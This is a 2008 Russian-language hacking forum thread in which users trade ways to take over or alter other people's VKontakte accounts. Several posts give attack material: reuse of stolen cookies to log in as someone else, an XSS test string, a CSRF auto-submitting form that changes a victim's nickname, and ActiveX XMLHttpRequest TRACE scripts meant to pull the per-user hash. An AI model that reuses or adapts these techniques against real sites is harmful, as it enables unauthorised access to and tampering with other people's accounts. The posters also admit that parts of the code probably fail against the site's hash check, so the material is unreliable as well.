ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Оффтоп > Болталка
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #11  
Старый 22.03.2008, 01:38
Аватар для .:EnoT:.
.:EnoT:.
Постоянный
Регистрация: 29.05.2007
Сообщений: 852
Провел на форуме:
4832771

Репутация: 1916


По умолчанию

Цитата:
1.Просто через куки не получится- там же идёт ещё и сессия, или я чёто путаю, возможно конечно снифером утощить, но както все геморно получается
2.Скриптами?конечно так нельзя
1) Заведи второй акк и поэксперементурий. Подставив чужие куки тебя пустит на чужой акк без проблем. Сниффером? Ты баги знаешь серьёзные? делись давай))
2) Раньше было можно. Почитай группы вконтакте под названиями "Финты вконтакте" и "<script>alert(\'xak\')</script>" увлекательно))
 
Ответить с цитированием

  #12  
Старый 22.03.2008, 01:41
Аватар для Petr
Petr
Banned
Регистрация: 10.06.2006
Сообщений: 938
Провел на форуме:
7792614

Репутация: 1223


По умолчанию

там в настройках по гету все меняется, сформируй ссылку и дай юзеру и все
 
Ответить с цитированием

  #13  
Старый 22.03.2008, 01:51
Аватар для .:EnoT:.
.:EnoT:.
Постоянный
Регистрация: 29.05.2007
Сообщений: 852
Провел на форуме:
4832771

Репутация: 1916


По умолчанию

Sandjuro
Зайка ты конечно извини, но я скажу честно. ты заёб писать в темах для того чтобы просто отписаться, типо подумают что ты умный =/
ПОКАЖИТЕ МНЕ ГДЕ ТАМ МЕТОД ГЕТ??

 
Ответить с цитированием

  #14  
Старый 22.03.2008, 02:04
Аватар для __mad
__mad
Участник форума
Регистрация: 04.11.2007
Сообщений: 103
Провел на форуме:
548128

Репутация: 104
По умолчанию

какая разница что у тебя там написано то?
в вконтакте регистр глобал ОН вообщет... так что как хочешь так и передавай...
 
Ответить с цитированием

  #15  
Старый 22.03.2008, 02:06
Аватар для +toxa+
+toxa+
[Лишённый самовыражени
Регистрация: 16.01.2005
Сообщений: 1,787
Провел на форуме:
9751379

Репутация: 3812


Отправить сообщение для +toxa+ с помощью ICQ Отправить сообщение для +toxa+ с помощью AIM
По умолчанию

PHP код:
<form name='hek' method=post action='http://vkontakte.ru/settings.php'>
<
input type=hidden name=act value='change_nickname'>
<
input type=hidden name=subm value='1'>
<
input type=hidden name=nickname value='hekker'>
</
form>
<
script>hek.submit();></script
тока наврятли работать будет ибо есть некая переменная hash которая, как я подозреваю, уникальна для каждого id (или же от сессии зависит)
__________________
 
Ответить с цитированием

  #16  
Старый 22.03.2008, 02:21
Аватар для .:EnoT:.
.:EnoT:.
Постоянный
Регистрация: 29.05.2007
Сообщений: 852
Провел на форуме:
4832771

Репутация: 1916


По умолчанию

Цитата:
какая разница что у тебя там написано то?
в вконтакте регистр глобал ОН вообщет... так что как хочешь так и передавай...
Откуда такая информация что на контакте регистр_гл.=on ? хз я лично не слышал)
И почитайте пожалуйста про регистр_глобалс.
Нет, если в обработчике предположим данные получаются с помощью $_REQUEST[''] то я не спорю, она примет данные и постом и гетом) Но если данные принимаются из определённого метода, т.е. к примеру пост $_POST[''], то из гета он данные не возьмёт.
Более того, я думаю что те кто занимается поддержкой движка контакта не такие дураки чтобы врубать регистр_глобалс и получать переменные сразу из запроса, не используя массивы =/ хотя хз, но имхо если б так было, то контакт бы ломали по 100 раз на дню...
 
Ответить с цитированием

  #17  
Старый 22.03.2008, 02:38
Аватар для ZET36
ZET36
Участник форума
Регистрация: 08.10.2007
Сообщений: 259
Провел на форуме:
500748

Репутация: 137
По умолчанию

но там ещё переменная hash идёт индификация каждого юзера

Код HTML:
http://vkontakte.ru/settings.php?hash=[хэшюзера]&act=change_nickname&subm=1&nickname=zet36
так что автоформы там нету

хотя можо попробывать выдернуть значение этого hash с помощью activeX функций в джаваскрипте но это будет актуально только для ослика. щас попробую
 
Ответить с цитированием

  #18  
Старый 22.03.2008, 02:52
Аватар для ZET36
ZET36
Участник форума
Регистрация: 08.10.2007
Сообщений: 259
Провел на форуме:
500748

Репутация: 137
По умолчанию

хых что то странно неполучается выдернуть код страницы с контакта
Код:

<SCRIPT>

var x = new ActiveXObject("Microsoft.XMLHTTP");
x.open("rnTRACE","http://vkontakte.ru",false);
x.setRequestHeader("Max-Forwards","0");
x.send();

document.write(x.responseText);



</SCRIPT>
когда с яндэкса пашет
Код:

<SCRIPT>

var x = new ActiveXObject("Microsoft.XMLHTTP");
x.open("rnTRACE","http://yandex.ru",false);
x.setRequestHeader("Max-Forwards","0");
x.send();

document.write(x.responseText);



</SCRIPT>
 
Ответить с цитированием

  #19  
Старый 22.03.2008, 02:54
Аватар для __mad
__mad
Участник форума
Регистрация: 04.11.2007
Сообщений: 103
Провел на форуме:
548128

Репутация: 104
По умолчанию

хэш статичный для каждого юзера...
сессий вконтакте нету... всё держится на куках... ( с сессиями он бы валялся постоянно)

Цитата:
Откуда такая информация
проверено...
вот к примеру... vkontakte.ru/login.php?email=&pass=
подставь мыло и пасс и в адресную строку... и ты залогинешься... хотя форма ПОСТ...
 
Ответить с цитированием

  #20  
Старый 22.03.2008, 02:58
Аватар для ZET36
ZET36
Участник форума
Регистрация: 08.10.2007
Сообщений: 259
Провел на форуме:
500748

Репутация: 137
По умолчанию

а вот для изменении личной инфы этот хэш нужен при неправильном хэше страница выдаёт
Ошибка безопасности. Попытка изменения имени неуспешна.
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
ищу прогу Смена айпи Скорпион Soft - Windows 6 08.02.2008 23:07
Помогите настроить брут для угона ника. seeattact Чаты 2 18.01.2006 16:05
Установка id ника в чате Don Kapone Чаты 0 30.06.2005 16:00



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ